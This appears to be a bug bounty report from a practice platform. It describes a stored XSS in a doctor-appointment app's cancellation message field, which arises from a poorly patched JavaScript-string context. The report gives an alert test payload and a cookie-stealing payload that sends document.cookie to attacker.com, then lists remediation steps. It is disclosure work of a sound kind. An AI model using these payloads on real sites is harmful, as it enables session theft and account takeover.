BugBountyHunter

Description

Hello Sean,

When users cancel their appointments they can leave a message for the doctor. Proper sanitization is not implemented in place which makes Stored XSS possible on this endpoint. This vulnerability leads to a one-click account takeover.

The developer tried to fix the other vulnerability on this endpoint. However, it wasn't properly patched which results in another Stored-XSS on the /manageappointment.php endpoint.

The reflection context changes from <textarea> to JavaScript variable, and several special characters such as < > are filtered. However, as the reflection context is inside the JavaScript variable, it is possible to break out of the syntax using the ' character and input the XSS payload.

Steps To Reproduce

1. Make an appointment using the /book-appointment.html endpoint:

You will be given an appointment ID, that you can further use to check your appointment:

2. Use your appointment ID on the /yourappointments.php endpoint and Intercept the request to Modify Appointments.

• Use '-alert(document.cookie)-' as the value of the message parameter:

3. Revisit the /yourappointments.php endpoint using your appointment ID, and XSS executes:

Exploitation

To further exploit this XSS, an attacker can craft a payload to steal the victim's cookies, which leads to account takeover:

';let%20img%3ddocument.createElement('img');img.src='//attacker.com/'%2bdocument.cookie;document.body.appendChild(img);let%20a='

• Here is the /manageappointment.php source code after the injection:

• After the victim opens the malicious URL, his cookies will be sent to the attacker's server without him realizing it.

Impact

• XSS leading to one-click account takeover.

Remediation

• Implement proper sanitization on the message parameter.
• Filtering/Escaping various special characters e.g. < " ' >
• Set httponly cookies so that javascript can not access the cookies.
• Remove/Expire the drps cookies after logging out.

Kind Regards,

HolyBugx